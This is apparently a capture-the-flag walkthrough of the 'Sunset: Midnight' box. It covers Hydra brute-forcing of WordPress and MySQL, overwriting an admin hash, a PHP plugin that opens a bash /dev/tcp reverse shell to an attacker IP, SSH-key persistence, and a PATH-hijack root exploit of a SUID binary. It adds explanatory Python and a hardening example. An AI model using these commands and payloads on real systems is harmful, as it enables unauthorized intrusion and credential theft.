835b797b1e2e3a1bd8c520ebcfe40a9f.png

0. Preface

This is a very straightforward machine. There is a small rabbit hole right at the start with the Simply Poll plugin, though.

In this box, we will be tackling:

  1. Weird Hydra results.
  2. Resetting WordPress passwords through the database.
  3. Getting a reverse shell using a WordPress “plugin”.
  4. Exploiting an SUID binary.

1. Preliminary NMAP Scan

sudo nmap -sC -sV -oN nmap.txt 192.168.32.9 -v

2a2b126914bf9898bdbb0227c44a1fac.png

Port 80 is open, and robots.txt has an entry for /wp-admin, so this is most likely running WordPress. Port 3306 (MySQL) is also open, which we rarely see exposed on a box, so we definitely need to check that out as well.

2. WordPress Login

Let’s start with the website.

3f22d7d9bbd27c10eeb9c64238b12d4a.png

Nothing much to see here. Let's try to brute-force /wp-admin with Hydra.

hydra -l admin -P /usr/share/wordlists/rockyou.txt sunset-midnight http-post-form "/wp-admin:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered for the username"

5313d3c9b89ae1fc7dcd97badd643122.png

Interestingly, Hydra reports a whole list of "valid" credentials, but none of them actually work. The reason is the target path: the WordPress login form lives at /wp-login.php, not /wp-admin, so the POST is answered with a redirect chain rather than the login page carrying the error text. The failure string we told Hydra to look for never appears in the response, so Hydra treats every attempt as a success. Pointing the module at /wp-login.php (and verifying any hit by hand) fixes this; for now, let's move on to the MySQL server on port 3306 and brute-force it with Hydra as well.

hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://sunset-midnight

1389fe2299e6ccfb17e77bb22111c1d3.png

We got a hit - root:robert. Let’s login.

mysql -u 'root' -p -h 192.168.32.9

e1020cd2a9b0b516fc68d872b831ec6f.png

Let’s do a basic enumeration of databases.

select * from information_schema.schemata;

4685a1bab189036c2951f78537d32706.png

Now, let’s see what’s inside wordpress_db.

select table_name from information_schema.tables where table_schema='wordpress_db';

eab6436ee969c0af1012a144ee4da617.png

Alright, there is a users table. Let's see if we can pull some password hashes.

use wordpress_db;
select * from wp_users;
select user_login,user_pass from wp_users;

3493869df3e4dd0c3d7e853b3d8b7a94.png

Let's try to crack the hash with John (it detects the WordPress phpass format on its own).

sudo john --wordlist=/usr/share/wordlists/rockyou.txt wp-admin.hash
sudo john --show wp-admin.hash

7227758a6091a8617214895c6275e119.png

No luck here. Rather than keep cracking, we can overwrite the stored hash in the database. WordPress still accepts a bare 32-character MD5 in user_pass as a legacy format (it re-hashes it with its normal scheme on the next successful login), so an unsalted md5('admin') is enough. Note down the original hash from the earlier select first so it can be restored afterwards.

update wp_users set user_pass = md5('admin') where id=1 limit 1;

d757489c783f327fc81c44efe8947b22.png

Now we can try to login to /wp-admin with admin:admin.

11cde12aca2dcdbfa3812430c7064c43.png

And we’re in.
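To see why writing md5('admin') into user_pass is enough, here is a short Python model of WordPress's password check. This is an added example, not code from the walkthrough or from WordPress itself: it reimplements the portable phpass scheme WordPress used before 6.8 (prefix "$P$B", meaning 2^13 = 8192 MD5 iterations, with an 8-character salt) and the legacy 32-character MD5 fallback that wp_check_password() honours. The function names (wp_hash_password, legacy_md5, reset_statement) and the constructed salt are this example's own. It also lets you generate a proper "$P$" hash to write into the table instead of relying on the MD5 fallback.

```python
import hashlib
import os
from typing import Optional

# phpass's alphabet; the index of the 4th character of a hash is the cost.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass's own base64 variant (not RFC 4648): 6-bit groups,
    least-significant bits first, no padding."""
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_crypt(password: str, setting: str) -> str:
    """Portable phpass: `setting` is '$P$', one cost character and an
    8-character salt. The hash is md5(salt+pw) iterated 2**cost more times."""
    if setting[:3] != "$P$":
        raise ValueError("not a portable phpass hash")
    count_log2 = ITOA64.index(setting[3])      # 'B' -> 13 -> 8192 rounds
    if not 7 <= count_log2 <= 30:
        raise ValueError("cost out of range")
    pw = password.encode()
    digest = hashlib.md5(setting[4:12].encode() + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def wp_hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Generate a hash with WordPress's parameters: cost index 8+5 (the 'B'
    after '$P$') and 8 salt characters encoded from 6 random bytes."""
    raw = os.urandom(6) if salt is None else salt
    setting = "$P$" + ITOA64[8 + 5] + _encode64(raw, 6)
    return phpass_crypt(password, setting)


def legacy_md5(password: str) -> str:
    """What MySQL's md5('admin') produced in the walkthrough."""
    return hashlib.md5(password.encode()).hexdigest()


def wp_check_password(password: str, stored: str) -> bool:
    """Mirror of wp_check_password(): a stored value of 32 characters or
    fewer is compared as legacy unsalted MD5 (WordPress then re-hashes it
    with phpass on that login); anything else is verified as phpass."""
    if len(stored) <= 32:
        return legacy_md5(password) == stored
    if not stored.startswith("$P$") or len(stored) != 34:
        return False
    return phpass_crypt(password, stored) == stored


def reset_statement(user_id: int, password: str) -> str:
    """The UPDATE to run instead of `set user_pass = md5(...)` when you want
    a hash WordPress would have generated itself."""
    return ("update wp_users set user_pass = '%s' where ID = %d limit 1;"
            % (wp_hash_password(password), user_id))


if __name__ == "__main__":
    print(reset_statement(1, "admin"))
```

The MD5 path is only a compatibility shim, so the moment you log in WordPress replaces the value; that is another reason to keep a copy of the original hash if you need to put the box back the way you found it.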

3. WordPress Plugin Reverse Shell

Now that we're in, we can get a reverse shell through the plugin upload feature: any PHP file with a plugin header is accepted, and it is executed when the plugin is activated. Let's create the following PHP file as our "plugin":

<?php
/**
 * Plugin Name: abcdefg
 * Author: hijklmnop
 */

// shell_exec() runs through /bin/sh, which on Debian is dash and has no
// /dev/tcp support, hence the explicit bash -c wrapper.
shell_exec("bash -c 'bash -i >& /dev/tcp/192.168.32.4/8000 0>&1'");
?>

Then zip it on the attacking machine:

7z a rev.zip rev.php

525d855bfdbb0d5105b6d21a37f64645.png

Now we can upload the plugin, start a netcat listener on port 8000, then activate the plugin to trigger the reverse shell. The activation request will hang for as long as the shell is alive, because shell_exec() blocks until the command exits; that is expected. Remember to deactivate and delete the plugin afterwards, since the file runs on every page load while it is active.

923b4b04b6dd336b95b0411f9a8427bb.png

36761ae82c084da68ae3131e7e2051e1.png

4. Pivoting to User

Since we're running as www-data, let's look at /etc/passwd to see which users have a login shell and are worth pivoting to.

3ca20eef74e04739beeaeb2902c6007f.png

Let’s see if we can’t pivot to jose. We can automatically enumerate this machine with linpeas.sh, so let’s upload and run that.

675782816ce7cce6bb21057143e2bac7.png

linpeas flags the database credentials in wp-config.php: jose with password 645dc5a8871d2a4269d4cbe23f6ae103. wp-config.php stores DB_USER and DB_PASSWORD in plaintext, and database passwords are often reused for local accounts, so let's try su to jose with the same password.

e8707c6c288b1e62500c17e926d1807e.png

Now we’re in. Let’s grab the user flag first.

Next, for a more permanent foothold, we will generate an SSH key pair with ssh-keygen.

d403289a0c3d34cc18ca5d9f030f1eb9.png

Now that we have generated the key pair, append the contents of id_rsa.pub to /home/jose/.ssh/authorized_keys. If the directory did not already exist, make sure ~/.ssh is mode 700 and authorized_keys mode 600, otherwise sshd (with its default StrictModes) will ignore the key.

8ddfaf4366820c14a1877a4809703598.png

Let's log back in over SSH using the private key.

ssh jose@192.168.32.9 -i ./keys/id_rsa

bdc4ed3bea1d42a0d0c75dc44775bba8.png

5. Exploiting SUID to Root

Let’s upload and run linpeas.sh again.

72fb632bf2e19d1ce97f315db27fb288.png

In the output, we see /usr/bin/status with the SUID/SGID bit set. It does not belong to any standard package, so it is most likely a custom binary. Running it just produces an error.

cb1168153b5a76b305d4cac915f691a7.png

Let’s run strings on it to roughly see what it does.

5e1557f429d9037db0e5eabccc049fa2.png

The strings show that it runs service by name rather than by absolute path, and that command doesn't exist on this box, hence the error. Because the SUID binary inherits our environment, we can write our own service in /home/jose that spawns a root shell, put that directory first in PATH, and let the binary execute it for us. Save the following as /home/jose/service and make it executable (chmod +x):

#!/bin/bash
# -p keeps the effective UID if the SUID binary did not also set the real
# UID; without it bash drops privileges when euid != uid.
exec /bin/bash -p

This works because service is looked up through $PATH, so we need /home/jose in front of the existing entries.

export PATH=/home/jose:$PATH

f3bec1579c033784179648994857bc47.png

Next, we can run which service to verify that our script is what will be found when the binary executes service.

452fe132c91c1e83bcd46ed351b5b00b.png

Now, let’s run /usr/bin/status and get a root shell.

73553e5a23c3474c314656b984773d0f.png
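To make the PATH hijack concrete without needing a SUID binary, here is an added Python example (not part of the walkthrough) that reproduces the mechanics of /usr/bin/status in a temporary directory: it plants a fake service, runs a command the way C's system() does (via /bin/sh -c with the inherited PATH), shows how a fixed search path and a list-style exec defeat it, and includes a small PATH audit of the kind linpeas performs. SAFE_PATH, plant_fake_command, run_like_system, run_hardened, audit_path and demo_hijack are this example's own names, and the fake command prints a marker instead of spawning a shell.

```python
import os
import shutil
import stat
import subprocess
import tempfile

# The search path a privileged helper should use instead of the caller's PATH.
SAFE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def plant_fake_command(directory, name, marker):
    """Attacker side: drop an executable script called `name` into a
    directory we control. The real one would exec /bin/bash -p; this one
    only prints `marker` so we can tell it ran."""
    path = os.path.join(directory, name)
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\necho %s\n" % marker)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return path


def run_like_system(command, path_env):
    """What a C program's system("service ssh status") does: /bin/sh -c,
    with the first word resolved through whatever PATH the process inherited
    (a SUID binary inherits the unprivileged caller's environment)."""
    proc = subprocess.run(command, shell=True, env={"PATH": path_env},
                          capture_output=True, text=True)
    return proc.stdout.strip()


def run_hardened(name, args, path_env=SAFE_PATH):
    """Defender side: resolve the helper against a fixed path, refuse to run
    if it is not there, pass argv as a list (no shell) and a minimal env."""
    resolved = shutil.which(name, path=path_env)
    if resolved is None:
        raise FileNotFoundError(name)
    proc = subprocess.run([resolved] + list(args), env={"PATH": path_env},
                          capture_output=True, text=True)
    return resolved, proc.stdout.strip()


def audit_path(path_env):
    """PATH entries an attacker could plant a binary in: empty or relative
    entries (resolved against the cwd) and directories writable by us."""
    bad = []
    for entry in path_env.split(os.pathsep):
        if entry == "" or not os.path.isabs(entry):
            bad.append(entry)
        elif os.path.isdir(entry) and os.access(entry, os.W_OK):
            bad.append(entry)
    return bad


def demo_hijack(name="service"):
    """Reproduce `export PATH=/home/jose:$PATH` followed by running the SUID
    binary, using a temp dir (constructed here) in place of /home/jose."""
    with tempfile.TemporaryDirectory() as attacker_dir:
        planted = plant_fake_command(attacker_dir, name, "HIJACKED")
        hijacked_path = attacker_dir + os.pathsep + SAFE_PATH
        return {
            "attacker_dir": attacker_dir,
            "planted": planted,
            # same answer `which service` gave on the box
            "resolved_with_hijack": shutil.which(name, path=hijacked_path),
            "resolved_with_safe_path": shutil.which(name, path=SAFE_PATH),
            "output_with_hijack": run_like_system(name + " ssh status", hijacked_path),
            "flagged_entries": audit_path(hijacked_path),
        }


if __name__ == "__main__":
    for key, value in demo_hijack().items():
        print(key, "=", value)
```

The fix on the binary side is the run_hardened pattern: an absolute or allow-listed lookup, no shell, and an environment the helper sets itself rather than inherits; the audit function is the quick check to run on a box when you find a SUID helper that shells out by name.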